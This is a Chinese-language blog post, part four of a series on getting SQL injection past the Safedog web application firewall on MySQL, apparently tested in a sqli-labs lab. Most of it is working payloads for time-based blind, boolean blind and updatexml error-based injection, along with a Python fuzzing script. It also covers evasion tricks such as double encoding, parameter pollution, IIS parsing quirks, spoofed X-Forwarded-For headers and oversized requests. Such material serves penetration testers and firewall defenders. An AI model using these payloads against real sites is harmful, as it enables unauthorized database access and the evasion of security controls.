<!DOCTYPE html><html lang="zh-cn"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><meta name="format-detection" content="telephone=no"><meta name="format-detection" content="email=no"><meta name="description"><meta name="keywords" content="Hexo, Gruntjs, Nodejs, Reactjs, Vuejs"><title>💉 SQLi_BYPASS_for_mysql Vol.4 - Naykcin's Page</title><link rel="stylesheet" href="/css/main_style.min.css"><link rel="icon" href="/logo.png"></head><body><input id="navi" type="checkbox"><ul class="main-navication"><li><a href="/"><span>Home</span></a></li><li><a href="https://github.com"><span>Github</span></a></li><li><a href="https://www.v2ex.com/"><span>V2EX</span></a></li></ul><div class="wrapper" id="wrap"><div class="post-header"><label class="navi-button light" for="navi">MENU</label><img class="background" src="http://47.95.140.43/typora_pic/background.JPG"><div class="post-title"><h1 class="title">💉 SQLi_BYPASS_for_mysql Vol.4</h1><ul class="meta"><li><i class="icon icon-author"></i>Naykcin</li><li><i class="icon icon-clock"></i>23 Minutes</li><li><i class="icon icon-calendar"></i>January 9, 2020</li></ul></div></div><div class="article-content" style="max-width:800px"><h2 id="💉-SQLi-BYPASS-for-mysql-Vol-4"><a href="#💉-SQLi-BYPASS-for-mysql-Vol-4" class="headerlink" title="💉 SQLi_BYPASS_for_mysql Vol.4"></a><center>💉 <em>SQLi_BYPASS_for_mysql Vol.4</em></center></h2><h3 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h3><ul>
<li>盲注 <em>BYPASS</em><ul>
<li>时间盲注 <em>BYPASS</em></li>
<li>布尔盲注 <em>BYPASS</em></li>
</ul>
</li>
<li>报错注入 <em>BYPASS</em></li>
<li><em>BYPASS</em> 思路<ul>
<li>Tricks</li>
</ul>
</li>
<li>后话</li>
</ul>
<h3 id="🎙️-0x00-前言"><a href="#🎙️-0x00-前言" class="headerlink" title="🎙️ 0x00 前言"></a>🎙️ 0x00 前言</h3><p>vol.3 主要记录了 union select BYPASS，这里接着上部分从盲注开始。</p>
<h3 id="0x22-盲注-BYPASS"><a href="#0x22-盲注-BYPASS" class="headerlink" title="0x22 盲注 BYPASS"></a>0x22 盲注 <em>BYPASS</em></h3><h4 id="时间盲注-BYPASS"><a href="#时间盲注-BYPASS" class="headerlink" title="时间盲注 BYPASS"></a>时间盲注 <em>BYPASS</em></h4><p>从时间盲注入手，相比布尔盲注要更灵活一些。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">?id=1 if(1=1,1,0)		不拦截</span><br><span class="line">?id=a if(1=1,1,0)		不拦截</span><br><span class="line">?id=1 and if(1=1,1,0) 	拦截</span><br><span class="line">?id=1 | if(1=1,1,0)	不拦截</span><br><span class="line">?id=1 || if(1=1,1,0) 拦截</span><br><span class="line">?id=1 &amp;&amp; if(1=1,1,0) 拦截</span><br><span class="line">?id=1 /*!and*/ if(1=1,1,0) 拦截</span><br><span class="line">?id=1 /*!11440and*/ if(1=1,1,0) 不拦截</span><br><span class="line">?id=1 andaif(1=1,1,0) 不拦截</span><br></pre></td></tr></table></figure>

<p>可以看出 <code>if()</code> 前面如果有连接词，安全狗是会拦截的，反之则不拦。利用上一章的方法内联注入是可以 BYPASS 的，这样可以直接进行后面的注入，除了这个方法我们再尝试一下其他的绕过方式。</p>
<p>⚠️ <strong>拓展</strong></p>
<p><code>and!!!1=1</code>，and 后面可以接上奇数个特殊的字符，包括但不限于 <code>! ~ &amp; -</code>，这样就可以构造 payload 了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and!!!if((substr((select hex(user/**/(/*!*/))),1,8)=/*!&apos;726F6F74&apos;*/),sleep/**/(/*!5*/),0) -- +</span><br></pre></td></tr></table></figure>

<p>⚠️ <strong>注意</strong></p>
<p>这里在对 <code>user()</code> 的结果进行十六进制编码的时候需要注意 hex 函数的构造位置：</p>
<p><img src="http://47.95.140.43/tu/sqli_bypass4/Screenshot%202020-02-23%20%E4%B8%8B%E5%8D%884.40.06.jpg" alt="Screenshot 2020-02-23 下午4.40.06"></p>
<p>另外，安全狗似乎对 <code>&#39;数字型&#39;</code> 做了过滤，所以这里也需要简单的绕过。应用这个 payload，可以判断 <code>user()</code> 十六进制编码的前八位等于 <code>726f6f74</code>，解码等于 <code>root</code>，延时 5 秒返回页面，BYPASS 成功。</p>
<p><img src="http://47.95.140.43/tu/sqli_bypass4/Screenshot%202020-02-23%20%E4%B8%8B%E5%8D%885.11.40.jpg" alt="Screenshot 2020-02-23 下午5.11.40"></p>
<h4 id="布尔盲注-BYPASS"><a href="#布尔盲注-BYPASS" class="headerlink" title="布尔盲注 BYPASS"></a>布尔盲注 <em>BYPASS</em></h4><p>布尔注入绕过相对来说是最简单的，因为可以不使用条件语句，少了一个绕过点。这里也记录一下思路：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and &apos;a&apos; 拦截</span><br><span class="line">?id=1 and a		不拦截</span><br><span class="line">?id=1 and!!!a 不拦截</span><br><span class="line"></span><br><span class="line">然后针对 ?id=1 and!!!substr((select user()),1,4)=&apos;root&apos; 构造 payload 为：</span><br><span class="line"></span><br><span class="line">?id=1 and!!!substr((select unhex(hex(user/**/(/*!*/)))),1,4)=/*!&apos;root&apos;*/ -- +</span><br></pre></td></tr></table></figure>

<p>成功 BYPASS：</p>
<p><img src="http://47.95.140.43/tu/sqli_bypass4/Screenshot%202020-02-23%20%E4%B8%8B%E5%8D%885.26.31.jpg" alt="Screenshot 2020-02-23 下午5.26.31"></p>
<p>最后其实发现安全狗对于布尔盲注的过滤其实很差，测试以下 payload 也是可以绕过的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and!!!substr((select unhex(hex(user/**/(/*!*/)))),1,4)=/*!&apos;root&apos;*/ -- + BYPASS 成功</span><br><span class="line"></span><br><span class="line">?id=1 /*!and*/ substr((select unhex(hex(user/**/(/*!*/)))),1,4)=/*!&apos;root&apos;*/ -- + 拦截</span><br><span class="line"></span><br><span class="line">// 将 and 换成 &amp;&amp;</span><br><span class="line">?id=1 %26%26 substr((select unhex(hex(user/**/(/*!*/)))),1,4)=/*!&apos;root&apos;*/ -- + 拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; /*!%26%26*/ substr((select unhex(hex(user/**/(/*!*/)))),1,4)=/*!&apos;root&apos;*/ -- + 不拦截，成功 BYPASS</span><br></pre></td></tr></table></figure>

<p>成功 BYPASS：</p>
<p><img src="http://47.95.140.43/tu/sqli_bypass4/Screenshot%202020-02-23%20%E4%B8%8B%E5%8D%885.38.45.jpg" alt="Screenshot 2020-02-23 下午5.38.45"></p>
<p>盲注部分结束，总之就是一句话：不断地 fuzz 来构造 payload。</p>
<h3 id="0x23-报错注入-BYPASS"><a href="#0x23-报错注入-BYPASS" class="headerlink" title="0x23 报错注入 BYPASS"></a>0x23 报错注入 <em>BYPASS</em></h3><p>我们已经测试了联合注入 BYPASS、盲注 BYPASS，这里记录一下报错注入 BYPASS，还是利用 <code>updatexml()</code> 函数。</p>
<p>首先我们再次回顾一下 <code>updatexml()</code> 这个函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">updatexml() 函数有三个参数：updatexml(xml_document,xpath_string,new_value)。</span><br><span class="line"></span><br><span class="line">第一个参数：xml_document 是 string 格式，为 xml 文档对象的名称。</span><br><span class="line"></span><br><span class="line">第二个参数：xpath_string，xpath 格式的字符串。</span><br><span class="line"></span><br><span class="line">第三个参数：new_value 是 string 格式，替换查找到的符合条件的数据。</span><br><span class="line"></span><br><span class="line">该函数的作用：改变文档中符合条件的节点的值。</span><br></pre></td></tr></table></figure>

<p>前几章我们用来报错注入的 payload 为：<code>updatexml(1,concat(0x7e,(select @@version),0x7e),1)</code>，其中 <code>concat()</code> 函数的作用是将函数内的结果连接成字符串，因此不符合 xpath_string 的格式，从而出现格式错误，达到报错注入的目的。</p>
<p>接下来我们开始 fuzz：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?id=updatexml 不拦截</span><br><span class="line">?id=updatexml() 不拦截</span><br><span class="line">?id=updatexml(1,2,3) 拦截</span><br><span class="line">?id=updatexml(1,2,) 不拦截</span><br><span class="line">?id=updatexml(1,2,!) 拦截</span><br><span class="line">?id=updatexml(1,2,hex()) 拦截</span><br><span class="line">?id=1 and updatexml(1,2,) 不拦截</span><br><span class="line">?id=1 and updatexml(1,2,3) 拦截</span><br></pre></td></tr></table></figure>

<p>经过 fuzz 我们可以发现，安全狗会判断 <code>updatexml()</code> 函数的完整性，当逗号分隔出现三个字符时，就会拦截，有些个别的特殊字符也没有过滤。</p>
<p>所以我们在括号里面构造 payload 的难度比较大，换一种思路，我们可以给 <code>updataxml()</code> 函数外面套一个外套：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=/*!14400updatexml*/(1,1,1) 不拦截</span><br><span class="line">?id=/*updatexml*/(1,1,1) 不拦截</span><br><span class="line">?id=/*!updatexml*/(1,1,1) 拦截</span><br></pre></td></tr></table></figure>

<p>绕过 <code>updatexml()</code> 函数之后，继续 fuzz，我们在前面加个运算符号：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and /*!updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; or /*!updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; /*!and*/ /*!updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; /*!%26%26*/ /*!updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 不拦截，成功报错</span><br><span class="line"></span><br><span class="line">?id=1&apos; /*!||*/ /*!11440updatexml*/(1,(select hex(user())),1) -- + 不拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; /*!xor*/ /*!11440updatexml*/(1,select hex(user/**/(/**/)),1) -- + 不拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; | /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 不拦截</span><br><span class="line"></span><br><span class="line">?id=1&apos; xor /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1) -- + 不拦截</span><br></pre></td></tr></table></figure>

<p>或者利用反引号 ` 来包裹 <code>updatexml()</code>，ASCII 96：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://1.1.1.1/?id=1&apos; and `updatexml`(1,(select hex(user/**/(/**/))),1) -- +</span><br></pre></td></tr></table></figure>

<p>尝试写个小脚本来测试一下是否还有别的可包含的：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">177</span>):</span><br><span class="line">  url = <span class="string">r"http://172.16.232.206/sqli-labs/Less-1/?id=1%27%20&#123;fuzz&#125;updatexml&#123;fuzz&#125;(1,(select hex(user/**/(/**/))),1)%20--%20+"</span>.format(fuzz=urllib.quote(chr(i)))</span><br><span class="line">  req = requests.get(url)</span><br><span class="line">  <span class="keyword">if</span> <span class="string">"F6F7"</span> <span class="keyword">in</span> req.text:</span><br><span class="line">    <span class="keyword">print</span> len(req.text),i,urllib.quote(chr(i))</span><br></pre></td></tr></table></figure>

<p>报错注入到这里结束。有时候可能发现某个方法可绕过，也许这个方法全局有效，这样就可以很大程度上提高效率。</p>
<h3 id="0x24-BYPASS-思路"><a href="#0x24-BYPASS-思路" class="headerlink" title="0x24 BYPASS 思路"></a>0x24 <em>BYPASS</em> 思路</h3><p>其实对于 WAF 的绕过无非就是利用 WEB 程序的缺陷（过滤不严格）、容器特性、网络协议、数据库特性来组合利用绕过，从用户发出请求到数据库的每一点，来寻找突破口，这就是一个不断 fuzz 的过程。</p>
<h4 id="Tricks"><a href="#Tricks" class="headerlink" title="Tricks"></a>Tricks</h4><ul>
<li>HTTP 协议利用</li>
<li>大小写混淆</li>
<li>替换</li>
<li>利用特殊字符</li>
<li>编码绕过</li>
<li>等价替换</li>
<li>中间件特性</li>
<li>白名单</li>
<li>缓冲溢出（这个我也不懂，好高端的样子）</li>
</ul>
<p>等等等等，只要你能想得到。</p>
<h4 id="HTTP-协议利用"><a href="#HTTP-协议利用" class="headerlink" title="HTTP 协议利用"></a>HTTP 协议利用</h4><p>HTTP 协议中有很多功能，一般用到的是 URL 编码。也有数据包分块传入来 BYPASS 的思路，但是可能比较复杂：</p>
<ol>
<li>构造畸形数据包</li>
<li>编码</li>
<li>分块</li>
<li>数据包溢出</li>
</ol>
<p>HTTP 协议是有一定的容错性的，通过这个容错性去绕过上传。编码绕过的原理也差不多，因为一般是程序去解码，一般 WAF 不做解码的工作（因为可能会降低效率），所以无法识别。数据包溢出则是因为数据包过大 waf 自动丢弃而不识别。</p>
<h4 id="大小写混淆"><a href="#大小写混淆" class="headerlink" title="大小写混淆"></a>大小写混淆</h4><p>大小写混淆一般可用来绕过一些简单的正则，现在似乎很少可以 BYPASS 了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UnIon SeLecT</span><br></pre></td></tr></table></figure>

<h4 id="替换"><a href="#替换" class="headerlink" title="替换"></a>替换</h4><p>有时 WAF 的正则可能会将数据包中的关键词给剔除，但是没有进行多次的匹配，所以可能导致 BYPASS：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ununionion selselectect</span><br><span class="line">un/**/ion sel/**/ect</span><br></pre></td></tr></table></figure>

<h4 id="特殊字符"><a href="#特殊字符" class="headerlink" title="特殊字符"></a>特殊字符</h4><p>这一般是由于数据库的特性，利用数据库可以使用多种符号、运算符来绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">`updatexml`(1,1,1)</span><br><span class="line">and!!!1=1</span><br><span class="line">/**/</span><br><span class="line">/*!50000*/</span><br></pre></td></tr></table></figure>

<h4 id="利用编码"><a href="#利用编码" class="headerlink" title="利用编码"></a>利用编码</h4><p>其实和 HTTP 协议差不多，这里是指多重编码。URL 编码会自己解码一次，但是有的程序可多次解码，还有的程序是支持 base64 编码的，所以也可以构造 pyload。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// url 编码两次</span><br><span class="line">=  👉🏻  %3d  👉🏻  %25%33%44</span><br><span class="line"></span><br><span class="line">// base64 编码</span><br><span class="line">and 1=1  👉🏻  YW5kIDE9MQ==</span><br></pre></td></tr></table></figure>

<h4 id="等价替换"><a href="#等价替换" class="headerlink" title="等价替换"></a>等价替换</h4><p>很好理解，mysql 有很多函数，某个函数如果被过滤可以查找手册，利用返回结果差不多的函数来替换：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">substr((select user()),1,1)</span><br><span class="line">substring((select user()),1,1)</span><br><span class="line">Left((select version()),1)</span><br></pre></td></tr></table></figure>

<h4 id="中间件特性"><a href="#中间件特性" class="headerlink" title="中间件特性"></a>中间件特性</h4><ol>
<li><p><strong><em>IIS</em></strong></p>
<p>有时候容器的特性会给我们 BYPASS 带来帮助。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// IIS+ASP 的 % 特性</span><br><span class="line">当传入的 select 被 % 分割成 s%e%l%e%c%t 时，解析出来还是 select</span><br><span class="line"></span><br><span class="line">// IIS+ASP 的 unicode 特性</span><br><span class="line">IIS 支持 unicode 解析，传入 s%u0065lect 会被解析为 select</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong><em>hpp</em></strong></p>
<p>hpp 参数污染，之前 BYPASS Safedog 时用到过。不同中间件对我们传入的值解析顺序也是不同的，这一点也可以利用。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">// PHP+Apache</span><br><span class="line">&amp;id=1&amp;id=2 Apache   只解析最后一个</span><br><span class="line"></span><br><span class="line">    +------------------------------------------------------------------+</span><br><span class="line">    | Web Server      | Parameter Interpretation     | Example         |</span><br><span class="line">    +------------------------------------------------------------------+</span><br><span class="line">    | ASP.NET/IIS     | Concatenation by comma       | par1=val1,val2  |</span><br><span class="line">    | ASP/IIS         | Concatenation by comma       | par1=val1,val2  |</span><br><span class="line">    | PHP/Apache      | The last param is resulting  | par1=val2       |</span><br><span class="line">    | JSP/Tomcat      | The first param is resulting | par1=val1       |</span><br><span class="line">    | Perl/Apache     | The first param is resulting | par1=val1       |</span><br><span class="line">    | DBMan           | Concatenation by two tildes  | par1=val1~~val2 |</span><br><span class="line">    +------------------------------------------------------------------+</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong><em>HTTP Parameter Contamination</em></strong></p>
<p>不同的容器也会将我们的参数中带入的一些特殊字符解析成不同的东西，比如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">+-------------------------------------------------------------------+</span><br><span class="line">| Query String    |    Web Servers response / GET values            |</span><br><span class="line">+-------------------------------------------------------------------+</span><br><span class="line">|                 | Apache/2.2.16, PHP/5.3.3     | IIS6/ASP         |</span><br><span class="line">+-------------------------------------------------------------------+</span><br><span class="line">| ?test[1=2       | test_1=2                     | test[1=2         |</span><br><span class="line">| ?test=%         | test=%                       | test=            |</span><br><span class="line">| ?test%00=1      | test=1                       | test=1           |</span><br><span class="line">| ?test=1%001     | NULL                         | test=1           |</span><br><span class="line">| ?test+d=1+2     | test_d=1 2                   | test d=1 2       |</span><br><span class="line">+-------------------------------------------------------------------+</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h4 id="白名单"><a href="#白名单" class="headerlink" title="白名单"></a>白名单</h4><p>有些程序对本地 IP 不会进行拦截，如果它的 host 使用 <code>X-Forwarded-For</code> 来获取的话，我们可以尝试伪造这个头部信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X-Forward-For:127.0.0.1</span><br></pre></td></tr></table></figure>

<h4 id="缓冲溢出"><a href="#缓冲溢出" class="headerlink" title="缓冲溢出"></a>缓冲溢出</h4><p>有的 waf 对于数据包的处理有上线，早期的 Safedog 如果提交过长的 URL 可能会直接崩溃：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLecT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</span><br></pre></td></tr></table></figure>

<h4 id="🌍-参考"><a href="#🌍-参考" class="headerlink" title="🌍 参考"></a>🌍 参考</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://www.exploit-db.com/papers/17934</span><br><span class="line">https://www.digitalmunition.me/2018/02/sql-injection-9-ways-bypass-web-application-firewall/</span><br></pre></td></tr></table></figure>

<p>总而言之，BYPASS 不能只简单局限于某一种，同时它也是一个经验积累的过程，需要了解 mysql 的语法、特殊符号、特殊写法，fuzz waf 融错的地方。</p>
<p><em>SQLi_BYPASS_for_mysql</em> 系列还没有完结，后期还有绕阿里云盾、云锁等测试，以及 <em>SQLi_BYPASS_for_mssql</em> 系列。</p>
<p>本系列文章如有错误请指出，欢迎交流。</p>
<p><em>Hard work and no play makes Nick a dull boy.</em></p>
</div><div class="article-meta" style="max-width:800px"></div><div class="article-comment" style="max-width:800px"><div class="ds-thread" id="ds-thread" data-thread-key="ckadu9ewg000swl90jt0yw9al" data-title="💉 SQLi_BYPASS_for_mysql Vol.4" data-url="http://www.naykcin.top/2020/01/09/sqlibypass4/" site-name="ueibo"></div><script>var siteName = document.getElementById('ds-thread').getAttribute('site-name');
var duoshuoQuery = {short_name: siteName};
(function() {
  var ds = document.createElement('script');
  ds.type = 'text/javascript';ds.async = true;
  ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
  ds.charset = 'UTF-8';
  (document.getElementsByTagName('head')[0] 
  || document.getElementsByTagName('body')[0]).appendChild(ds);
})();</script></div><ul class="navication"><li class="home"><a href="/"><i class="icon icon-home"></i></a></li><li><a href="/2020/01/12/MS14-068/"><i class="icon icon-arror-left"></i></a></li><li><a href="/2020/01/08/sqlibypass3/"><i class="icon icon-arror-right"></i></a></li></ul><div class="page-footer"><div class="top"><ul class="social"><li><a href="https://github.com/NickYan7" title="Github" target="_blank"><i class="icon icon-github"></i></a></li><li><a href="http://47.95.140.43/tu/721580653348_.pic.jpg" title="wechat" target="_blank"><i class="icon icon-wechat"></i></a></li></ul></div><div class="bottom"><p class="copyright">© 2020 Naykcin's Page</p></div></div></div><script>var wrap = document.getElementById('wrap');
window.onload = function () {
  wrap.className += ' done';
}</script></body></html>